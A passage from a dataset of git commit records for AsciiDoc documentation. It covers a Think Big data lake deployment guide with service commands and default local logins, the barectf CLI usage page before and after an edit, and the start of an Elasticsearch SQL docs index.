rebooted\n\nFor starting and stopping the 3 data lake accelerator services there you can run the following scripts\n\n \/opt\/thinkbig\/start-thinkbig-apps.sh\n \/opt\/thinkbig\/stop-thinkbig-apps.sh\n\n1. To Start individual services\n\n $ service activemq start\n $ service elasticsearch start\n $ service nifi start\n $ service thinkbig-spark-shell start\n $ service thinkbig-services start\n $ service thinkbig-ui start\n\n2. To Stop individual services\n\n $ service activemq stop\n $ service elasticsearch stop\n $ service nifi stop\n $ service thinkbig-spark-shell stop\n $ service thinkbig-services stop\n $ service thinkbig-ui stop\n\n3. To get the status of individual services\n\n $ service activemq status\n $ service elasticsearch status\n $ service nifi status\n $ service thinkbig-spark-shell status\n $ service thinkbig-services status\n $ service thinkbig-ui status\n\n== Viewing Service Output\n\n=== Configuring Log Output\n\nLog output for the services mentioned above are configured at:\n\n\t\t\t\/opt\/thinkbig\/thinkbig-ui\/conf\/log4j.properties\n\t\t\t\/opt\/thinkbig\/thinkbig-services\/conf\/log4j.properties\n\nYou may place logs where desired according to the 'log4j.appender.file.File' property. Note the configuration line:\n\n\t\t\tlog4j.appender.file.File=\/var\/log\/<app>\/<app>.log\n\n=== Viewing Log Output\n\nThe default log locations for the various applications are located at:\n\n\/var\/log\/<service_name>\n\n== Web and REST Access\n\nBelow are the default URL's and ports for the services\n\n Feed Manager and Operations UI\n http:\/\/127.0.0.1:8400\n username: dladmin\n\tpassword: thinkbig\n\n NiFi UI\n http:\/\/127.0.0.1:8079\n\n Elasticsearch REST API\n http:\/\/127.0.0.1:9200\n\n ActiveMQ Admin\n http:\/\/127.0.0.1:8161\/admin\n\n\n== Appendix: Cleanup script\nFor development and sandbox environments you can leverage the cleanup script to remove all of the Think Big services as well as Elasticsearch,\nActiveMQ, and NiFi.\n\n $ \/opt\/thinkbig\/setup\/dev\/cleanup-env.sh\n\n IMPORTANT Only run this in a DEV environment. This will delete all application and the MySQL schema\n\n== Appendix: Postgres Integration\n\nTBD\n\t\n","old_contents":"= Data Lake Accelerator Deployment Guide\nThink Big Analytics\nMay 2016\n\n:toc:\n:toclevels: 2\n:toc-title: Contents\n\n== About\n\nThis document explains how to install the data lake accelerator framework as well as Elasticsearch, NiFi, and ActiveMQ. There are a few different ways you can\ninstall it depending on whether or not you are installing all components on one edge node vs. multiple nodes.\n\n== System Requirements\n\n=== Dependencies\n\nThe Data Lake Accelerator services should be installed on an edge node. The following should be available prior to the installing the Data Lake Starter.\n\n.Dependencies\n|===\n|Redhat\/GNU\/Linux distributions\n|RPM (for install)\n|Java 1.7 (or greater)\n|Hadoop 2.4+\n|Spark 1.5.x+\n|Apache NiFi 0.5+ (or Hortonworks DataFlow)\n|Hive\n|MySQL\n|===\n\n.Tested Platforms\n|===\n|Platform|URL|Version\n\n|Hortonworks Sandbox|http:\/\/hortonworks.com\/products\/hortonworks-sandbox\/| HDP 2.3, 2.4\n|===\n\n== Installation\n\n=== Procedure for installing all components on 1 edge node\n\nFollow the steps below to install the data lake accelerator. This procedure is also recommended for installing to a Hortonworks sandbox.\n\n\n. Login to the the host using root or sudo access\n\n. Find and download the RPM file from artifactory and place on the host linux machine. You can right click the download link and copy the url to use wget instead\n\n http:\/\/54.152.98.43:8080\/artifactory\/webapp\/search\/artifact\/?7&q=thinkbig-datalake-accelerator (requires VPN)\n\n. Run RPM install\n\n $ rpm -ivh thinkbig-datalake-accelerator-<version>.noarch.rpm\n\n. Run the setup wizard - \/opt\/thinkbig\/setup\/setup-wizard.sh\n\n Follow the directions and it will install the following:\n * MySQL or Postgres scripts into the local database\n * Elasticsearch\n * ActiveMQ\n * NiFi and the Think Big dependencies\n\n Elasticsearch, NiFi, and ActiveMQ will be started when the wizard is finished\n\n. Start the 3 Think Big applications\n\n $ \/opt\/thinkbig\/start-thinkbig-apps.sh\n\n At this point all applications should be running\n\nTIP: See section below on how to use the cleanup script to completely remove all of the components above. This is useful in a DEV or sandbox environment so you can run a clean install.\n\n=== Procedure for installing each component manually\n\nFollow the steps below to install the data lake accelerator manually. This method is useful if you are deploying products across multiple edge nodes\n\n\n1. For each step login to the the host using root or sudo access\n\n2. Find and download the RPM file from artifactory and place on the host linux machine you want to install the data lake accelerator services on. You can right click the download link and copy the url to use wget instead\n\n http:\/\/54.152.98.43:8080\/artifactory\/webapp\/search\/artifact\/?7&q=thinkbig-datalake-accelerator (requires VPN)\n\n3. Run data lake accelerator RPM install\n\n $ rpm -ivh thinkbig-datalake-accelerator-<version>.noarch.rpm\n\n4. Run the database scripts (see database configuration section)\n\n\n5. Install Elasticsearch\n\n You can leverage an existing elasticsearch installation or follow the steps in the elasticsearch script used by the wizard.\n\n \/opt\/thinkbig\/setup\/elasticsearch\/install-elasticsearch.sh\n\n6. Install ActiveMQ\n\n You can leverage an existing ActiveMQ installation or follow the steps in the ActiveMQ script used by the wizard\n\n \/opt\/thinkbig\/setup\/activemq\/install-activemq.sh\n\n NOTE: If installing on a different node than NiFi and thinkbig-services you will need to update the following properties\n \/opt\/nifi\/ext-config\/config.properties\n\n spring.activemq.broker-url\n\n \/opt\/thinkbig\/thinkbig-services\/conf\/application\/properties\n\n jms.activemq.broker.url\n\n\n7. Install NiFI\n\n You can leverage an existing NiFi installation or follow the steps in the setup directory which is used by the wizard. There are two steps:\n\n 1. Install NiFi\n \/opt\/thinkbig\/setup\/nifi\/install-nifi.sh\n\n 2. Install Think Big specific components\n \/opt\/thinkbig\/setup\/nifi\/install-thinkbig-components.sh\n\n8. Start the 3 Think Big applications\n\n $ \/opt\/thinkbig\/start-thinkbig-apps.sh\n\n At this point all applications should be running\n\n== Configuration\n\n=== Configuration Files\n\nConfiguration for the data lake accelerator services are located under the following files:\n\n \/opt\/thinkbig\/thinkbig-ui\/conf\/application.properties\n \/opt\/thinkbig\/thinkbig-services\/conf\/application.properties\n\n\n=== Configuration Properties\n\nBelow is a list of the properties provided by the Pipeline Controller that can be used in the application.properties\nfile. You can use externalized configuration from command line arguments, for example '--spring.config.location=classpath:\/override.properties'.\nSee http:\/\/docs.spring.io\/spring-boot\/docs\/current\/reference\/html\/boot-features-external-config.html for details.\n\n\n.Server Configuration Properties\n|===\n|Configuration Property|Required|Example\n\n|server.port||8400\n|||\n|===\n\n=== Database Setup\n\nData lake services can be configured to work with Postgres or MySQL. Database and permission setup scripts are provided to assist in the initial configuration process. The script names relevant to setup are below:\n\n==== My SQL\n|===\n|Script Name|Description\n|\/opt\/thinkbig\/setup\/sql\/mysql\/setup-mysql.sh|Create tables used by data lake accelerator services\n|\/opt\/thinkbig\/setup\/sql\/mysql\/drop-mysql.sh DROP|Used to remove the data lake accelerator schema(s)\n|===\n\n\n==== Postgres\nTBD - Not yet supported\n\n\n=== Optimizing Performance\n\nYou can adjust the memory setting of the Pipeline Controller Service using the PIPELINE_APPLICATION_OPTS environment variable. \n\n export THINKBIG_UI_OPTS=Xmx4g\n export THINKBIG_SERVICES_OPTS=Xmx4g\n \nThe setting above would set the Java maximum heap size to 4 GB. \n\n\n== Starting the Services\nNote: These below are installed as services and should start and stop automatically when the machine is rebooted\n\nFor starting and stopping the 3 data lake accelerator services there you can run the following scripts\n\n \/opt\/thinkbig\/start-thinkbig-apps.sh\n \/opt\/thinkbig\/stop-thinkbig-apps.sh\n\n1. To Start individual services\n\n $ service activemq start\n $ service elasticsearch start\n $ service nifi start\n $ service thinkbig-spark-shell start\n $ service thinkbig-services start\n $ service thinkbig-ui start\n\n2. To Stop individual services\n\n $ service activemq stop\n $ service elasticsearch stop\n $ service nifi stop\n $ service thinkbig-spark-shell stop\n $ service thinkbig-services stop\n $ service thinkbig-ui stop\n\n3. To get the status of individual services\n\n $ service activemq status\n $ service elasticsearch status\n $ service nifi status\n $ service thinkbig-spark-shell status\n $ service thinkbig-services status\n $ service thinkbig-ui status\n\n== Viewing Service Output\n\n=== Configuring Log Output\n\nLog output for the services mentioned above are configured at:\n\n\t\t\t\/opt\/thinkbig\/thinkbig-ui\/conf\/log4j.properties\n\t\t\t\/opt\/thinkbig\/thinkbig-services\/conf\/log4j.properties\n\nYou may place logs where desired according to the 'log4j.appender.file.File' property. Note the configuration line:\n\n\t\t\tlog4j.appender.file.File=\/var\/log\/<app>\/<app>.log\n\n=== Viewing Log Output\n\nThe default log locations for the various applications are located at:\n\n\/var\/log\/<service_name>\n\n== Web and REST Access\n\nBelow are the default URL's and ports for the services\n\n Feed Manager and Operations UI\n http:\/\/127.0.0.1:8400\n username: dladmin\n\tpassword: thinkbig\n\n NiFi UI\n http:\/\/127.0.0.1:8079\n\n Elasticsearch REST API\n http:\/\/127.0.0.1:9200\n\n ActiveMQ Admin\n http:\/\/127.0.0.1:8161\/admin\n\n\n== Appendix: Postgres Integration\n\nTBD\n\t\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0a29f21a7826530f608b4589fbf5ff5b3ecf2dde","subject":"docs: cli: usage.adoc: improve page","message":"docs: cli: usage.adoc: improve page\n\nChanges:\n\n* Add link to <https:\/\/git-scm.com\/>.\n\n* Use the third person for the command descriptions in the\n General description section.\n\n* Add and fix many internal links.\n\n* Specify that `PREFIX` must be a valid C identifier.\n\nSigned-off-by: Philippe Proulx <2096628897b40c93960fdd9e24c9c883a54d4fe9@gmail.com>\n","repos":"efficios\/barectf,efficios\/barectf","old_file":"docs\/modules\/cli\/pages\/usage.adoc","new_file":"docs\/modules\/cli\/pages\/usage.adoc","new_contents":"= `barectf` CLI tool usage\n\nbarectf ships with the `barectf` command-line interface (CLI) tool.\n\n== General synopses\n\nRun a `barectf` command:\n\n[.cl]\n[verse]\n*barectf* _COMMAND_ _COMMAND-ARGUMENTS_\n\nPrint the version of `barectf`:\n\n[.cl]\n[verse]\n*barectf* pass:[[]xref:#version-option[--version]pass:[\\]]\n\nPrint brief general help:\n\n[.cl]\n[verse]\n*barectf* pass:[[]xref:#help-option[--help]pass:[\\]]\n\n== General description\n\nThe `barectf` tool offers a https:\/\/git-scm.com\/[Git]-like\nuser interface with the following available commands:\n\n<<generate-command,`generate`>>::\n Generates the C{nbsp}source and CTF metadata stream files of a\n tracer from a xref:yaml:index.adoc[YAML configuration file].\n\n<<show-effective-configuration-command,`show-effective-configuration`>>::\n Prints the xref:yaml:index.adoc#stages[_effective_] version of\n a YAML configuration file.\n\n<<show-configuration-version-command,`show-configuration-version`>>::\n Prints the major version (2 or 3) of a YAML configuration file.\n\n== General options\n\n[[help-option]]`-h`::\n`--help`::\n Print brief general help and exit.\n\n[[version-option]]`-V`::\n`--version`::\n Print the version of `barectf` and exit.\n\n[[generate-command]]\n== `generate` command\n\n=== Synopses\n\nGenerate files from a xref:yaml:index.adoc[YAML configuration file]:\n\n[.cl]\n[verse]\n*barectf generate* pass:[[]xref:#generate-prefix-option[--prefix]=__PREFIX__] pass:[[]xref:#generate-metadata-dir-option[--metadata-dir]=__MDIR__]\n pass:[[]xref:#generate-headers-dir-option[--headers-dir]=__HDIR__] pass:[[]xref:#generate-code-dir-option[--code-dir]=__CDIR__]\n pass:[[]xref:#generate-include-dir-option[--include-dir]=__IDIR__]...\n pass:[[]xref:#generate-ignore-include-not-found-option[--ignore-include-not-found]pass:[\\]] _CONFIG-PATH_\n\nPrint command's brief help:\n\n[.cl]\n[verse]\n*barectf generate* xref:#generate-help-option[--help]\n\n=== Command name aliases\n\n* `gen`\n\n=== Description\n\nThe `barectf generate` command reads the xref:yaml:index.adoc[YAML\nconfiguration file] `__CONFIG-PATH__` to produce:\n\n[%autowidth.stretch, cols=\"d,a\"]\n|===\n|File name |Description\n\n|`__MDIR__\/metadata`\n|The CTF metadata stream file.\n\n|`__HDIR__\/__FPREFIX__.h`\n|The generated tracer's public C{nbsp}header file.\n\n|`__HDIR__\/__FPREFIX__-bitfield.h`\n|Internal macros for the generated tracer (included by `__FPREFIX__.c`).\n\n|`__CDIR__\/__FPREFIX__.c`\n|The generated tracer's C{nbsp}source code.\n|===\n\nSee xref:lel[Build the generated C{nbsp}source code] to learn how to\nbuild the C{nbsp}source which the `generate` command produces.\n\nIn the list above, `__FPREFIX__` is:\n\nWithout the <<generate-prefix-option,`--prefix`>> option::\n If the `__CONFIG-PATH__` file has a file name xref:yaml:cfg-obj.adoc#prefix-prop[prefix option]:::\n The `__CONFIG-PATH__` file's file name prefix option.\n Otherwise:::\n `barectf`\n\nWith the <<generate-prefix-option,`--prefix`>> option::\n `__PREFIX__`, without trailing underscores.\n+\nFor example, if `__PREFIX__` is `my_tracer_`, then `__FPREFIX__` is\n`my_tracer`.\n\nBy default, `__MDIR__`, `__HDIR__`, and `__CDIR__` are the current\nworking directory. Use the\n<<generate-metadata-dir-option,`--metadata-dir`>>,\n<<generate-headers-dir-option,`--headers-dir`>>, and\n<<generate-code-dir-option,`--code-dir`>> to specify other output\ndirectories.\n\nTherefore, by default, the `generate` command writes the `metadata`,\n`barectf.h`, `barectf-bitfield.h`, and `barectf.c` files to the current\nworking directory.\n\nIf you use the <<prefix-option,`--prefix`>> option, then all the\npublic C{nbsp}identifiers in `__FPREFIX__.h` and `__FPREFIX__.c` begin\nwith `__PREFIX__`. Otherwise, they begin with:\n\nIf the `__CONFIG-PATH__` file has an identifier xref:yaml:cfg-obj.adoc#prefix-prop[prefix option]::\n The `__CONFIG-PATH__` file's identifier prefix option.\n\nOtherwise::\n `barectf_`\n\nAdd directories to be searched into for xref:yaml:include.adoc[inclusion\nfiles] before the default inclusion directories with the repeatable\n<<generate-include-dir-option,`--include-dir`>> option.\n\nBy default, if `barectf` can't find an inclusion file while processing\nthe `__CONFIG-PATH__` file, the command prints an error and\n<<exit-status,exits>> with a non-zero status. Force\n`barectf generate` to continue silently instead with its\n<<generate-ignore-include-not-found-option,`--ignore-include-not-found`>>\noption.\n\n=== Options\n\n[[generate-code-dir-option]]`-c __CDIR__`::\n`--code-dir=__CDIR__`::\n Write the C{nbsp}source file to the directory `__CDIR__` instead of\n the current working directory.\n\n[[generate-headers-dir-option]]`-H __HDIR__`::\n`--headers-dir=__HDIR__`::\n Write C{nbsp}header files to the directory `__HDIR__` instead of\n the current working directory.\n\n[[generate-help-option]]`-h`::\n`--help`::\n Print the `generate` command's brief help and exit.\n\n[[generate-ignore-include-not-found-option]]`--ignore-include-not-found`::\n Continue to process the `__CONFIG-PATH__` file when inclusion\n files are not found.\n\n[[generate-include-dir-option]]`-I __IDIR__`::\n`--include-dir=__IDIR__`::\n Add `__IDIR__` to the list of directories to be searched into for\n inclusion files before the default inclusion directories.\n+\nThe default inclusion directories are:\n+\n. The current working directory.\n. The directory containing the\n xref:yaml:include.adoc#std[standard partial YAML files]\n (like `stdint.yaml`).\n\n[[generate-metadata-dir-option]]`-m __MDIR__`::\n`--metadata-dir=__MDIR__`::\n Write the CTF metadata stream file to the directory `__MDIR__`\n instead of the current working directory.\n\n[[generate-prefix-option]]`-p __PREFIX__`::\n`--prefix=__PREFIX__`::\n Override the default or `__CONFIG-PATH__` file's file and\n identifier prefixes with:\n+\nFile name prefix:::\n `__PREFIX__`, without trailing underscores.\nIdentifier prefix:::\n `__PREFIX__`\n\n+\n--\n`__PREFIX__` must be a valid C{nbsp}identifier.\n\nThe default file name prefix is `barectf`.\n\nThe default identifier prefix is `barectf_`.\n--\n\n[[show-effective-configuration-command]]\n== `show-effective-configuration` command\n\n=== Synopses\n\nShow the xref:yaml:index.adoc#stages[effective] version of a\nxref:yaml:index.adoc[YAML configuration file]:\n\n[.cl]\n[verse]\n*barectf show-effective-configuration* pass:[[]xref:#show-effective-configuration-include-dir-option[--include-dir]=__IDIR__]...\n pass:[[]xref:#show-effective-configuration-ignore-include-not-found-option[--ignore-include-not-found]pass:[\\]] _CONFIG-PATH_\n\nPrint command's brief help:\n\n[.cl]\n[verse]\n*barectf show-effective-configuration* xref:#show-effective-configuration-help-option[`--help`]\n\n=== Command name aliases\n\n* `show-effective-config`\n* `show-effective-cfg`\n\n=== Description\n\nThe `barectf show-effective-configuration` command reads the\nxref:yaml:index.adoc[YAML configuration file] `__CONFIG-PATH__` and\nprints an equivalent, _effective_ YAML configuration.\n\nSee the xref:yaml:index.adoc#stages[processing stages] of a YAML\nconfiguration file to learn what an effective configuration is.\n\nMoreover, the `show-effective-configuration` command validates the\n`__CONFIG-PATH__` file. In other words, if the command\n<<exit-status,exits>> with status{nbsp}0, the\n<<generate-command,`generate` command>> using the same options and\n`__CONFIG-PATH__` file would also succeed.\n\nAdd directories to be searched into for inclusion files before the\ndefault inclusion directories with the repeatable\n<<show-effective-configuration-include-dir-option,`--include-dir`>> option.\n\nBy default, if `barectf` can't find an inclusion file while processing\nthe `__CONFIG-PATH__` file, the command prints an error and\n<<exit-status,exits>> with a non-zero status. Force\n`barectf show-effective-configuration` to continue silently instead\nwith its\n<<show-effective-configuration-ignore-include-not-found-option,`--ignore-include-not-found`>>\noption.\n\n=== Options\n\n[[show-effective-configuration-help-option]]`-h`::\n`--help`::\n Print the `show-effective-configuration` command's\n brief help and exit.\n\n[[show-effective-configuration-ignore-include-not-found-option]]`--ignore-include-not-found`::\n Continue to process the `__CONFIG-PATH__` file when inclusion\n files are not found.\n\n[[show-effective-configuration-include-dir-option]]`-I __IDIR__`::\n`--include-dir=__IDIR__`::\n Add `__IDIR__` to the list of directories to be searched into for\n inclusion files before the default inclusion directories.\n+\nThe default inclusion directories are:\n+\n. The current working directory.\n. The directory containing the\n xref:yaml:include.adoc#std[standard partial YAML files]\n (like `stdint.yaml`).\n\n[[show-configuration-version-command]]\n== `show-configuration-version` command\n\n=== Synopses\n\nShow a xref:yaml:index.adoc[YAML configuration file]'s version:\n\n[.cl]\n[verse]\n*barectf show-configuration-version* _CONFIG-PATH_\n\nPrint command's brief help:\n\n[.cl]\n[verse]\n*barectf show-configuration-version* xref:#show-configuration-version-help-option[`--help`]\n\n=== Command name aliases\n\n* `show-config-version`\n* `show-cfg-version`\n\n=== Description\n\nThe `barectf show-configuration-version` command reads the\nxref:yaml:index.adoc[YAML configuration file] `__CONFIG-PATH__` and\nprints its version, which is either 2 or 3.\n\nThe `show-configuration-version` does _not_ validate the\n`__CONFIG-PATH__` file like the\n<<show-effective-configuration-command,`show-effective-configuration`\ncommand>> does.\n\n=== Options\n\n[[show-configuration-version-help-option]]`-h`::\n`--help`::\n Print the `show-configuration-version` command's brief help\n and exit.\n\n[[exit-status]]\n== Exit status\n\n0::\n Success\n\nNot 0::\n Error\n","old_contents":"= `barectf` CLI tool usage\n\nbarectf ships with the `barectf` command-line interface (CLI) tool.\n\n== General synopses\n\nRun a `barectf` command:\n\n[.cl]\n[verse]\n*barectf* _COMMAND_ _COMMAND-ARGUMENTS_\n\nPrint the version of `barectf`:\n\n[.cl]\n[verse]\n*barectf* pass:[[]xref:#version-option[--version]pass:[\\]]\n\nPrint brief general help:\n\n[.cl]\n[verse]\n*barectf* pass:[[]xref:#help-option[--help]pass:[\\]]\n\n== General description\n\nThe `barectf` tool has a Git-like user interface with the following\navailable commands:\n\n<<generate-command,`generate`>>::\n Generate the C source and CTF metadata stream files of a tracer\n from a xref:yaml:index.adoc[YAML configuration file].\n\n<<show-effective-configuration-command,`show-effective-configuration`>>::\n Print the _effective_ YAML configuration file for a given YAML\n configuration file and inclusion directories.\n\n<<show-configuration-version-command,`show-configuration-version`>>::\n Print the major version (2 or 3) of a YAML configuration file.\n\n== General options\n\n[[help-option]]`-h`::\n`--help`::\n Print brief general help and exit.\n\n[[version-option]]`-V`::\n`--version`::\n Print the version of `barectf` and exit.\n\n[[generate-command]]\n== `generate` command\n\n=== Synopses\n\nGenerate files from configuration file:\n\n[.cl]\n[verse]\n*barectf generate* pass:[[]xref:#generate-prefix-option[--prefix]=__PREFIX__] pass:[[]xref:#generate-metadata-dir-option[--metadata-dir]=__MDIR__]\n pass:[[]xref:#generate-headers-dir-option[--headers-dir]=__HDIR__] pass:[[]xref:#generate-code-dir-option[--code-dir]=__CDIR__]\n pass:[[]xref:#generate-include-dir-option[--include-dir]=__IDIR__]...\n pass:[[]xref:#generate-ignore-include-not-found-option[--ignore-include-not-found]pass:[\\]] _CONFIG-PATH_\n\nPrint command's brief help:\n\n[.cl]\n[verse]\n*barectf generate* xref:#generate-help-option[--help]\n\n=== Command name aliases\n\n* `gen`\n\n=== Description\n\nThe `barectf generate` command reads the xref:yaml:index.adoc[YAML\nconfiguration file] `__CONFIG-PATH__` to produce:\n\n[%autowidth.stretch, cols=\"d,a\"]\n|===\n|File name |Description\n\n|`__MDIR__\/metadata`\n|The CTF metadata stream file.\n\n|`__HDIR__\/__FPREFIX__.h`\n|The generated tracer's public C{nbsp}header file.\n\n|`__HDIR__\/__FPREFIX__-bitfield.h`\n|Internal macros for the generated tracer (included by `__FPREFIX__.c`).\n\n|`__CDIR__\/__FPREFIX__.c`\n|The generated tracer's C{nbsp}source code.\n|===\n\nSee xref:lel[Build the generated C{nbsp}source code] to learn how to\nbuild the C{nbsp}source which the `generate` command produces.\n\nIn the list above, `__FPREFIX__` is:\n\nWithout the <<generate-prefix-option,`--prefix`>> option::\n If the `__CONFIG-PATH__` file has a file name xref:yaml:cfg-obj.adoc#prefix-prop[prefix option]:::\n The `__CONFIG-PATH__` file's file name prefix option.\n Otherwise:::\n `barectf`\n\nWith the <<generate-prefix-option,`--prefix`>> option::\n `__PREFIX__`, without trailing underscores.\n+\nFor example, if `__PREFIX__` is `my_tracer_`, then `__FPREFIX__` is\n`my_tracer`.\n\nBy default, `__MDIR__`, `__HDIR__`, and `__CDIR__` are the current\nworking directory. Use the\n<<generate-metadata-dir-option,`--metadata-dir`>>,\n<<generate-headers-dir-option,`--headers-dir`>>, and\n<<generate-code-dir-option,`--code-dir`>> to specify other output\ndirectories.\n\nTherefore, by default, the `generate` command writes the `metadata`,\n`barectf.h`, `barectf-bitfield.h`, and `barectf.c` files to the current\nworking directory.\n\nIf you use the <<prefix-option,`--prefix`>> option, then all the\npublic C{nbsp}identifiers in `__FPREFIX__.h` and `__FPREFIX__.c` begin\nwith `__PREFIX__`. Otherwise, they begin with:\n\nIf the `__CONFIG-PATH__` file has an identifier prefix option::\n The `__CONFIG-PATH__` file's identifier prefix option.\n\nOtherwise::\n `barectf_`\n\nAdd directories to be searched into for inclusion files before the\ndefault inclusion directories with the repeatable\n<<generate-include-dir-option,`--include-dir`>> option.\n\nBy default, if `barectf` can't find an inclusion file while processing\nthe `__CONFIG-PATH__` file, the command prints an error and\n<<exit-status,exits>> with a non-zero status. Force\n`barectf generate` to continue silently instead with its\n<<generate-ignore-include-not-found-option,`--ignore-include-not-found`>>\noption.\n\n=== Options\n\n[[generate-code-dir-option]]`-c __CDIR__`::\n`--code-dir=__CDIR__`::\n Write the C{nbsp}source file to the directory `__CDIR__` instead of\n the current working directory.\n\n[[generate-headers-dir-option]]`-H __HDIR__`::\n`--headers-dir=__HDIR__`::\n Write C{nbsp}header files to the directory `__HDIR__` instead of\n the current working directory.\n\n[[generate-help-option]]`-h`::\n`--help`::\n Print the `generate` command's brief help and exit.\n\n[[generate-ignore-include-not-found-option]]`--ignore-include-not-found`::\n Continue to process the `__CONFIG-PATH__` file when inclusion\n files are not found.\n\n[[generate-include-dir-option]]`-I __IDIR__`::\n`--include-dir=__IDIR__`::\n Add `__IDIR__` to the list of directories to be searched into for\n inclusion files before the default inclusion directories.\n+\nThe default inclusion directories are:\n+\n. The current working directory.\n. The directory containing the standard inclusion files\n (like `stdint.yaml`).\n\n[[generate-metadata-dir-option]]`-m __MDIR__`::\n`--metadata-dir=__MDIR__`::\n Write the CTF metadata stream file to the directory `__MDIR__`\n instead of the current working directory.\n\n[[generate-prefix-option]]`-p __PREFIX__`::\n`--prefix=__PREFIX__`::\n Override the default or `__CONFIG-PATH__` file's file and\n identifier prefixes with:\n+\nFile name prefix:::\n `__PREFIX__`, without trailing underscores.\nIdentifier prefix:::\n `__PREFIX__`\n\n+\n--\nThe default file name prefix is `barectf`.\n\nThe default identifier prefix is `barectf_`.\n--\n\n[[show-effective-configuration-command]]\n== `show-effective-configuration` command\n\n=== Synopses\n\nShow effective configuration:\n\n[.cl]\n[verse]\n*barectf show-effective-configuration* pass:[[]xref:#show-effective-configuration-include-dir-option[--include-dir]=__IDIR__]...\n pass:[[]xref:#show-effective-configuration-ignore-include-not-found-option[--ignore-include-not-found]pass:[\\]] _CONFIG-PATH_\n\nPrint command's brief help:\n\n[.cl]\n[verse]\n*barectf show-effective-configuration* xref:#show-effective-configuration-help-option[`--help`]\n\n=== Command name aliases\n\n* `show-effective-config`\n* `show-effective-cfg`\n\n=== Description\n\nThe `barectf show-effective-configuration` command reads the\nxref:yaml:index.adoc[YAML configuration file] `__CONFIG-PATH__` and\nprints an equivalent, _effective_ YAML configuration.\n\nSee the xref:yaml:index.adoc#stages[processing stages] of a YAML\nconfiguration file to learn what an effective configuration is.\n\nMoreover, the `show-effective-configuration` command validates the\n`__CONFIG-PATH__` file. In other words, if the command\n<<exit-status,exits>> with status{nbsp}0, the\n<<generate-command,`generate` command>> using the same options and\n`__CONFIG-PATH__` file would also succeed.\n\nAdd directories to be searched into for inclusion files before the\ndefault inclusion directories with the repeatable\n<<show-effective-configuration-include-dir-option,`--include-dir`>> option.\n\nBy default, if `barectf` can't find an inclusion file while processing\nthe `__CONFIG-PATH__` file, the command prints an error and\n<<exit-status,exits>> with a non-zero status. Force\n`barectf show-effective-configuration` to continue silently instead\nwith its\n<<show-effective-configuration-ignore-include-not-found-option,`--ignore-include-not-found`>>\noption.\n\n=== Options\n\n[[show-effective-configuration-help-option]]`-h`::\n`--help`::\n Print the `show-effective-configuration` command's\n brief help and exit.\n\n[[show-effective-configuration-ignore-include-not-found-option]]`--ignore-include-not-found`::\n Continue to process the `__CONFIG-PATH__` file when inclusion\n files are not found.\n\n[[show-effective-configuration-include-dir-option]]`-I __IDIR__`::\n`--include-dir=__IDIR__`::\n Add `__IDIR__` to the list of directories to be searched into for\n inclusion files before the default inclusion directories.\n+\nThe default inclusion directories are:\n+\n. The current working directory.\n. The directory containing the standard inclusion files\n (like `stdint.yaml`).\n\n[[show-configuration-version-command]]\n== `show-configuration-version` command\n\n=== Synopses\n\nShow configuration file's version:\n\n[.cl]\n[verse]\n*barectf show-configuration-version* _CONFIG-PATH_\n\nPrint command's brief help:\n\n[.cl]\n[verse]\n*barectf show-configuration-version* xref:#show-configuration-version-help-option[`--help`]\n\n=== Command name aliases\n\n* `show-config-version`\n* `show-cfg-version`\n\n=== Description\n\nThe `barectf show-configuration-version` command reads the\nxref:yaml:index.adoc[YAML configuration file] `__CONFIG-PATH__` and\nprints its version, which is either 2 or 3.\n\nThe `show-configuration-version` does _not_ validate the\n`__CONFIG-PATH__` file.\n\n=== Options\n\n[[show-configuration-version-help-option]]`-h`::\n`--help`::\n Print the `show-configuration-version` command's brief help\n and exit.\n\n[[exit-status]]\n== Exit status\n\n0::\n Success\n\nNot 0::\n Error\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"0b4b59c7849ce9be2aaaf60143df93688e5381e1","subject":"[DOCS] Fix typo (#68362) (#68380)","message":"[DOCS] Fix typo (#68362) (#68380)\n\nCo-authored-by: Jaskaran Bindra <32cdd33851e443e493b8cdca06f49bb0b764186d@gmail.com>","repos":"GlenRSmith\/elasticsearch,robin13\/elasticsearch,GlenRSmith\/elasticsearch,robin13\/elasticsearch,robin13\/elasticsearch,GlenRSmith\/elasticsearch,GlenRSmith\/elasticsearch,GlenRSmith\/elasticsearch,robin13\/elasticsearch,robin13\/elasticsearch","old_file":"docs\/reference\/sql\/index.asciidoc","new_file":"docs\/reference\/sql\/index.asciidoc","new_contents":"[role=\"xpack\"]\n[testenv=\"basic\"]\n[[xpack-sql]]\n= SQL access\n\n:sql-tests: {xes-repo-dir}\/..\/..\/plugin\/sql\/qa\/\n:sql-specs: {sql-tests}server\/src\/main\/resources\/\n:jdbc-tests: {sql-tests}jdbc\/src\/main\/java\/org\/elasticsearch\/xpack\/sql\/qa\/jdbc\n:security-tests: {sql-tests}server\/security\/src\/test\/java\/org\/elasticsearch\/xpack\/sql\/qa\/security\n:es-sql: Elasticsearch SQL\n\n[partintro]\n--\n\nX-Pack includes a SQL feature to execute SQL queries against {es}\nindices and return results in tabular format.\n\nThe following chapters aim to cover everything from usage, to syntax and drivers.\nExperienced users or those in a hurry might want to jump directly to\nthe list of SQL <<sql-commands, commands>> and <<sql-functions, functions>>.\n\n<<sql-overview, Overview>>::\n Overview of {es-sql} and its features.\n<<sql-getting-started, Getting Started>>::\n Start using SQL right away in {es}.\n<<sql-concepts, Concepts and Terminology>>::\n Language conventions across SQL and {es}.\n<<sql-security,Security>>::\n Secure {es-sql} and {es}.\n<<sql-rest,REST API>>::\n Execute SQL in JSON format over REST.\n<<sql-translate,Translate API>>::\n Translate SQL in JSON format to {es} native query.\n<<sql-cli,CLI>>::\n Command-line application for executing SQL against {es}.\n<<sql-jdbc,JDBC>>::\n JDBC driver for {es}.\n<<sql-odbc,ODBC>>::\n ODBC driver for {es}.\n<<sql-client-apps,Client Applications>>::\n Setup various SQL\/BI tools with {es-sql}.\n<<sql-spec,SQL Language>>::\n Overview of the {es-sql} language, such as supported data types, commands and\n syntax.\n<<sql-functions,Functions and Operators>>::\n List of functions and operators supported.\n<<sql-limitations,Limitations>>::\n {es-sql} current limitations.\n--\n\ninclude::overview.asciidoc[]\ninclude::getting-started.asciidoc[]\ninclude::concepts.asciidoc[]\ninclude::security.asciidoc[]\ninclude::endpoints\/index.asciidoc[]\ninclude::language\/index.asciidoc[]\ninclude::functions\/index.asciidoc[]\ninclude::appendix\/index.asciidoc[]\ninclude::limitations.asciidoc[]\n\n:jdbc-tests!:\n","old_contents":"[role=\"xpack\"]\n[testenv=\"basic\"]\n[[xpack-sql]]\n= SQL access\n\n:sql-tests: 